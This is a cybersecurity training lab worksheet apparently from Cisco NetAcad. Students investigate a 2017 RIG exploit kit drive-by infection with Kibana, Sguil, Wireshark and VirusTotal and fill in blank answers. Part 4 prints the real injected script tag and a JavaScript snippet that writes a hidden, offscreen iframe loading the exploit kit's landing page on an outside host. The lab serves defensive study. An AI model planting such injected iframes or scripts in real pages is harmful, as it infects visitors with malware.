Lab - Investigating a Malware Exploit

Objectives
In this lab you will:
Part 1: Use Kibana to Learn About a Malware Exploit
Part 2: Investigate the Exploit with Sguil
Part 3: Use Wireshark to Investigate an Attack
Part 4: Examine Exploit Artifacts
This lab is based on an exercise from the website malware-traffic-analysis.net which is an excellent resource
for learning how to analyze network and host attacks. Thanks to brad@malware-traffic-analysis.net for
permission to use materials from his site.

Background / Scenario
You have decided to interview for a job in a medium sized company as a Tier 1 cybersecurity analyst. You
have been asked to demonstrate your ability to pinpoint the details of an attack in which a computer was
compromised. Your goal is to answer a series of questions using Sguil, Kibana, and Wireshark in Security
Onion.
You have been given the following details about the event:
 The event happened in January of 2017.
 It was discovered by the Snort NIDS.

Required Resources
 Security Onion virtual machine
 Internet access

Instructions

Part 1: Use Kibana to Learn About a Malware Exploit

In Part 1, use Kibana to answer the following questions. To help you get started, you are informed that the
attack took place at some time during January 2017. You will need to pinpoint the exact time.

Step 1: Narrow the timeframe.

a. Login to Security Onion with the analyst username and cyberops password.
b. Open Kibana (username analyst and password cyberops) and set an Absolute time range to narrow the
focus to log data from January 2017.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 1 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

c. You will see a graph appear with a single entry showing. To view more details, you need to narrow the
amount of time that is displayed. Narrow the time range in the Total Log Count Over Time visualization by
clicking and dragging to select an area around the graph data point. You may need to repeat this process
until you see some detail in the graph.

<Post the screenshot of your kibana output>

Note: Use the <Esc> key to close any dialog boxes that may be interfering with your work.

Step 2: Locate the Event in Kibana

a. After narrowing the time range in the main Kibana dashboard, go to the NIDS Alert Data dashboard by
clicking NIDS.

<Post the screenshot of your kibana output>

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 2 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

b. Zoom in on the event by clicking and dragging in the NIDS – Alerts Over Time visualization further focus
in on the event timeframe. Since the event happened over a very short period of time, select just the
graph plot line. Zoom in until your display resembles the one below.

c. Click the first point on the timeline to filter for only that first event.

<Post the screenshot of your kibana output>

d. Now view details for the events that occurred at that time. Scroll all the way to the bottom of the
dashboard until you see the NIDS Alerts section of the page. The alerts are arranged by time. Expand
the first event in the list by clicking the pointer arrow that is to the left of the timestamp.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 3 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

<Post the screenshot of your kibana output>

e. Look at the expanded alert details and answer the following questions:
Questions:

What is the time of the first detected NIDS alert in Kibana?

Type your answers here.
What is the source IP address in the alert?
Type your answers here.
What is the destination IP address in the alert?
Type your answers here.
What is the destination port in the alert? What service is this?
Type your answers here.
What is the classification of the alert?
Type your answers here.
What is the destination geo country name?
Type your answers here.
f. In a web browser on a computer that can connect to the internet, go to the link that is provided in the
signature_info field of the alert. This will take you to the Emerging Threats Snort alert rule for the exploit.
There are a series of rules shown. This is because signatures can change over time, or new and more
accurate rules are developed. The newest rule is at the top of the page. Examine details of the rule.
Questions:

What is the malware family for this event?

Type your answers here.
What is the severity of the exploit?
Type your answers here.
What is an Exploit Kit? (EK) Search on the internet to answer this question.
Type your answers here.
Exploit kits frequently use what is called a drive-by attack to begin the attack campaign. In a drive-by
attack, a user will visit a website that should be considered safe. However, threat actors find ways to
compromise legitimate websites by finding vulnerabilities on the webservers that host them. The
vulnerabilities allow threat actors to insert their own malicious code into the HTML of a webpage. The
code is frequently inserted into an iFrame. iFrames permit content from different websites to be displayed
in the same webpage. Threat actors will frequently create an invisible iFrame that connects the browser to
a malicious website. The HTML from the website that is loaded into the browser often contains a
JavaScript that will send the browser to yet another malicious website or download malware until the
computer.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 4 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

Step 3: View the Transcript capME!

a. Click the alert _id value, you can pivot to CapME to inspect the transcript of the event.

In the CapME! window you can see the transcript from the session. It shows the transactions between the
source computer, in blue, and the destinations that are accessed by the source. A lot of valuable
information, including a link to the pcap file that is related to this alert, is available in the transcript.

<Post the screenshot of your output>

Examine the first block of blue text. This is the request from the source to the destination webserver. Note
that two URLs are listed in this block. The first is tagged as SRC: REFERER. This is the website that the
source computer first accessed. However, the server referred browser the HTTP GET request to the
SRC:HOST. Something in the HTML sent the source to this site. It looks like this could be a drive-by
attack!
Questions:

What website did the user intend to connect to?

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 5 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

Type your answers here.

What URL did the browser refer the user to?
Type your answers here.
What kind of content is requested by the source host from tybenme.com? Why could this be a problem?
Look in the DST server block of the transcript too.
Type your answers here.

b. Close the CapME! browser tab.

c. From the top of the NIDS Alert Dashboard click the HTTP entry located under Zeek Hunting heading.
d. In the HTTP dashboard, verify that your absolute time range includes 2017-01-27 22:54:30.000 to 2017-
01-27 22:56:00.000.
e. Scroll down to the HTTP - Sites section of the dashboard.
Question:

What are some of the websites that are listed?

Type your answers here.

We should know some of these websites from the transcript that we read earlier. Not all of the sites that
are shown are part of the exploit campaign. Research the URLs by searching for them on the internet. Do
not connect to them. Place the URLs in quotes when you do your searches.
Questions:

Which of these sites is likely part of the exploit campaign?

Type your answers here.

What are the HTTP - MIME Types listed in the Tag Cloud?
Type your answers here.

Part 2: Investigate the Exploit with Sguil

In Part 2, you will use Sguil to check the IDS alerts and gather more information about the series of events
related to this attack.
Note: The alert IDs used in this lab are for example only. The alert IDs on your VM may be different.

Step 1: Open Sguil and locate the alerts.

a. Launch Sguil from the desktop. Login with username analyst and password cyberops. Enable all
sensors and click Start.
b. Locate the group of alerts from January 27th 2017.

<Post the screenshot of your squil output>

Question:

According to Sguil, what are the timestamps for the first and last of the alerts that occurred within about a
second of each other?

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 6 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

Type your answers here.

b. Investigate the alerts in Sguil.

a. Click the Show Packet Data and Show Rule checkboxes to see the packet header field information and
the IDS signature rule related to the alert.
b. Select the alert ID 5.2 (Event message ET CURRENT Evil Redirector Leading to EK Jul 12 2016).
Question:

According to the IDS signature rule which malware family triggered this alert? You may need to scroll
through the alert signature to find this entry.
Type your answers here.
c. Maximize the Sguil window and size the Event Message column so that you can see the text of the entire
message. Look at the Event Messages for each of the alert IDs related to this attack.
Questions:

According to the Event Messages in Sguil what exploit kit (EK) is involved in this attack?
Type your answers here.
Beyond labelling the attack as trojan activity, what other information is provided regarding the type and
name of the malware involved?
Type your answers here.
By your best estimate looking at the alerts so far, what is the basic vector of this attack? How did the
attack take place?
Type your answers here.

Step 3: View Transcripts of Events

a. Right-click the associated alert ID 5.2 (Event Message ET CURRENT_EVENTS Evil Redirector Leading
to EK Jul 12 2016). Select Transcript from the menu as shown in the figure.

Question:

What are the referer and host websites that are involved in the first SRC event? What do you think the
user did to generate this alert?
Type your answers here.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 7 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

b. Right-click the alert ID 5.24 (source IP address of 139.59.160.143 and Event Message ET
CURRENT_EVENTS Evil Redirector Leading to EK March 15 2017) and choose Transcript to open a
transcript of the conversation.

<Post the screenshot of your transcript output>

c. Refer to the transcript and answer the following questions:

Questions:

What kind of request was involved?

Type your answers here.
Were any files requested?
Type your answers here.
What is the URL for the referer and the host website?
Type your answers here.
How the content encoded?
Type your answers here.
d. Close the current transcript window. In the Sguil window, right-click the alert ID 5.25 (Event Message ET
CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2) and open the transcript. According to the
information in the transcript answer the following questions:
Questions:

How many requests and responses were involved in this alert?

Type your answers here.
What was the first request?
Type your answers here.
Who was the referrer?
Type your answers here.
Who was the host server request to?
Type your answers here.
Was the response encoded?
Type your answers here.
What was the second request?

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 8 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

Type your answers here.

Who was the host server request to?
Type your answers here.
Was the response encoded?
Type your answers here.
What was the third request?
Type your answers here.
Who was the referrer?
Type your answers here.
What was the Content-Type of the third response?
Type your answers here.
What were the first 3 characters of the data in the response? The data starts after the last DST: entry.
Type your answers here.
CWS is a file signature. File signatures help identify the type of file that is represented different types of
data. Go to the following website https://en.wikipedia.org/wiki/List_of_file_signatures. Use Ctrl-F to open a
find box. Search for this file signature to find out what type of file was downloaded in the data.
Question:

What type of file was downloaded? What application uses this type of file?
Type your answers here.
e. Close the transcript window.
f. Right-click the same ID again and choose Network Miner. Click the Files tab.
Question:

How many files are there and what is the file types?
Type your answers here.

Part 3: Use Wireshark to Investigate an Attack

In Part 3, you will pivot to Wireshark to closely examine the details of the attack.

Step 1: Pivot to Wireshark and Change Settings.

a. In Sguil, right-click the alert ID 5.2 (Event Message ET CURRENT_EVENTS Evil Redirector Leading to
EK Jul 12 2016) and pivot to select Wireshark from the menu. The pcap that is associated with this alert
will open in Wireshark.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 9 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

b. The default Wireshark setting uses a relative time per-packet which is not very helpful for isolating the
exact time an event occurred. To fix this, select to View > Time Display Format > Date and Time of Day
and then repeat a second time, View > Time Display Format > Seconds. Now your Wireshark Time
column has the date and timestamps. Resize the columns to make the display clearer if necessary.

Step 2: Investigate HTTP Traffic.

a. In Wireshark, use the http.request display filter to filter for web requests only.

<Post the screenshot of your wireshark output>

b. Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application layer
data.
Question:

What website directed the user to the www.homeimprovement.com website?

Type your answers here.

Step 3: View HTTP Objects.

a. In Wireshark, choose File > Export Objects > HTTP.
b. In the Export HTTP objects list window, select the remodeling-your-kitchen-cabinets.html packet and save
it to your home folder.
c. Close Wireshark. In Sguil, right-click the alert ID 5.24 (source IP address 139.59.160.143 and Event
Message ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017) and choose
Wireshark to pivot to Wireshark. Apply an http.request display filter and answer the following questions:
Questions:

What is the http request for?

Type your answers here.
What is the host server?
Type your answers here.
d. In Wireshark, go to File > Export Objects > HTTP and save the JavaScript file to your home folder.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 10 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

e. Close Wireshark. In Sguil, right-click the alert ID 5.25 (Event Message ET CURRENT_EVENTS RIG EK
URI Struct Mar 13 2017 M2) and choose Wireshark to pivot to Wireshark. Apply an http.request display
filter. Notice that this alert corresponds to the three GET, POST, and GET requests that we looked at
earlier.
f. With the first packet selected, in the packet details area, expand the Hypertext Transfer Protocol
application layer data. Right-click the Host information and choose Apply as Column to add the Host
information to the packet list columns, as shown in the figure.

g. To make room for the Host column right-click the Length column header and uncheck it. This will remove
the Length column from the display.
h. The names of the servers are now clearly visible in the Host column of the packet list.

Step 4: Create a Hash for an Exported Malware File.

We know that the user intended to access www.homeimprovement.com, but the site referred the user to other
sites. Eventually files were downloaded to the host from a malware site. In this part of the lab, we will access
the files that were downloaded and submit a file hash to VirusTotal to verify that a malicious file was
downloaded.
a. In Wireshark, go to File > Export Objects > HTTP and save the two text/html files and the application/x-
shockwave-flash file to your home directory.

b. Now that you have saved the three files to your home folder, test to see if one of the files matches a
known hash value for malware at virustotal.com. Issue a ls -l command to look at the files saved in your
home directory. The flash file has the word SeaMonkey near the beginning of the long filename. The

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 11 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

filename begins with %3fbiw=SeaMonkey. Use the ls -l command with grep to filter out the filename with
the pattern seamonkey. The option -i ignores the case distinction.
analyst@SecOnion:~$ ls -l | grep -i seamonkey
-rw-r--r-- 1 analyst analyst 16261 Jun 9 05:50
%3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMonkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYG
OAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-
qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-
qoVzcCgWRxfs&ct=SeaMonkey&tuif=1166

<Post the screenshot of your command output>

c. Generate a SHA-1 hash for the SeaMonkey flash file with the command sha1sum followed by the
filename. Type the first 4 letters %3fb of the filename and then press the tab key to auto fill the rest of the
filename. Press enter and sha1sum will compute a 40 digit long fixed length hash value.
Highlight the hash value, right-click, and copy it. The sha1sum is highlighted in the example below. Note:
Remember to use tab completion.
analyst@SecOnion:~$ sha1sum %3fbiw\=SeaMonkey.105qj67.406x7d8b3\&yus\
=SeaMonkey.78vg115.406g6d1r6\&br_fl\=2957\&oq\
=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E-qKSErM62V7FjLhTJg\&q\
=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRxfs\&ct\
=SeaMonkey\&tuif\=1166
97a8033303692f9b7618056e49a24470525f7290 %3fbiw=SeaMonkey.105qj67.406x7d8b3&yus=SeaMo
nkey.78vg115.406g6d1r6&br_fl=2957&oq=pLLYGOAq3jxbTfgFplIgIUVlCpaqq3UbTykKZhJKB9BSKaA9E
-qKSErM62V7FjLhTJg&q=w3rQMvXcJx7QFYbGMvjDSKNbNkfWHViPxoaG9MildZqqZGX_k7fDfF-qoVzcCgWRx
fs&ct=SeaMonkey&tuif=1166

d. You can also generate a hash value by using NetworkMiner. Navigate to Sguil and right-click the alert ID
5.25 (Event Message ET CURRENT_EVENTS RIG EK URI Struct Mar 13 2017 M2) and select
NetworkMinor to pivot to NetworkMinor. Select the Files tab. In this example, right-click the file with swf
extension and select Calculate MD5 / SHA1 / SHA256 hash. Compare the SHA1 hash value with the
one from the previous step. The SHA1 hash values should be the same.
e. Open a web browser and go to virustotal.com. Click the Search tab and enter the hash value to search
for a match in the database of known malware hashes. VirusTotal will return a list of the virus detection
engines that have a rule that matches this hash.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 12 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

<Post the screenshot of your virtustotal output>

f. Investigate the Detection and Details tabs. Review the information that is provided on this hash value.
Question:

What did VirusTotal tell you about this file?

Type your answers here.

g. Close the browser and Wireshark. In Sguil, use alert ID 5.37 (Event Message ET CURRENT_EVENTS
RIG EK Landing Sep 12 2016 T2) to pivot to Wireshark and examine the HTTP requests.
Questions:

Are there any similarities to the earlier alerts?

Type your answers here.
Are the files similar? Do you see any differences?
Type your answers here.
h. Create a SHA-1 hash of the SWF file as you did previously.
Question:

Is this the same malware that was downloaded in the previous HTTP session?
Type your answers here.
i. In Sguil, the last 4 alerts in this series are related, and they also seem to be post-infection.
Questions:

Why do they seem to be post-infection?

Type your answers here.
What is interesting about first alert in the last 4 alerts in the series?
Type your answers here.
What type of communication is taking place in the second and third alerts in the series and what makes it
suspicious?
Type your answers here.
j. Go to virustotal.com and do a URL search for the .top domain used in the attack.
Question:

What is the result?

Type your answers here.
k. Examine the last alert in the series in Wireshark. If it has any objects worth saving, export and save them
to your home folder.
Question:

What are the filenames if any?

Type your answers here.

Part 4: Examine Exploit Artifacts

In this part, you will examine some of the documents that your exported from Wireshark.
a. In Security Onion, open the remodeling-your-kitchen-cabinets.html file using your choice of text editor.
This webpage initiated the attack.
Question:

Can you find the two places in the webpage that are part of the drive-by attack that started the exploit?
Hint: the first is in the <head> area and the second is in the <body> area of the page.
Write your answers here.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 13 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"

"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html
xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head profile="http://gmpg.org/xfn/11">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Remodeling Your Kitchen Cabinets | Home Improvement</title>

<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

feed=rss2" title="Home Improvement latest posts" />

<link rel="alternate" type="application/rss+xml" href="//www.homeimprovement.com/?

feed=comments-rss2" title="Home Improvement latest comments" />

<link rel="pingback" href="//www.homeimprovement.com/xmlrpc.php" />

<link rel="shortcut icon"

href="//www.homeimprovement.com/wp-content/themes/arras/images/favicon.ico" />

<script type="text/javascript"
src="//retrotip.visionurbana.com.ve/engine/classes/js/dle_js.js"></script>
<!-- All in One SEO Pack 2.3.2.3 by Michael Torbert of Semper Fi Web Design[291,330]
-->
<meta name="description" content="Installing cabinets in a remodeled kitchen require
some basic finish carpentry skills. Before starting any installation, it's a good idea
to mark some level and" />

<meta name="keywords" content="cabinets,kitchen,kitchen cabints,knobs,remodel" />

<some output omitted>

b. Open the dle_js.js file in choice of text editor and examine it.
document.write('<div class="" style="position:absolute; width:383px; height:368px;
left:17px; top:-858px;"> <div style="" class=""><a>head</a><a class="head-menu-2">
</a><iframe src="http://tyu.benme.com/?
q=zn_QMvXcJwDQDofGMvrESLtEMUbQA0KK2OH_76iyEoH9JHT1vrTUSkrttgWC&biw=Amaya.81lp85.406f4y
5l9&oq=elTX_fUlL7ABPAuy2EyALQZnlY0IU1IQ8fj630PWwUWZ0pDRqx29UToBvdeW&yus=Amaya.110oz60.
406a7e5q8&br_fl=4109&tuif=5364&ct=Amaya" width=290 height=257 ></ifr' +'ame> <a
style=""></a></div><a class="" style="">temp</a></div>');
Question:

What does the file do?

Type your answers here.

How does the code in the javascript file attempt to avoid detection?
Type your answers here.
c. In a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the
filename.
Examine the file and answer the following questions:
Questions:

What kind of file it is?

Type your answers here.
What are some interesting things about the iframe? Does it call anything?
Type your answers here.

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 14 of 15 www.netacad.com
Lab - Investigating a Malware Exploit

What does the start() function do?

Type your answers here.
What do you think the purpose of the getBrowser() function is?
Type your answers here.

Reflection
Exploit Kits are fairly complex exploits that use a variety of methods and resources to carry out an attack.
Interestingly EKs may be used to deliver diverse malware payloads. This is because the EK developer may
offer the exploit kit as a service to other threat actors. Therefore, RIG EK has been associated with a number
of different malware payloads. The following questions may require you investigate the data further using the
tools that were introduced in this lab.
1. The EK used a number of websites. Complete the table below.

URL IP Address Function

search engine links to legitimate

www.bing.com N/A webpage
blank blank blank
blank blank blank
blank blank blank
blank blank blank
blank blank blank

2. It is useful to “tell the story” of an exploit to understand what happened and how it works. Start with the user
searching the internet with Bing. Search the web for more information on the RIG EK to help.
Type your answers here.

End of document

<Post your selfie showing the completion of the activity>

 2020 - 2022 Cisco and/or its affiliates. All rights reserved. Cisco Public Page 15 of 15 www.netacad.com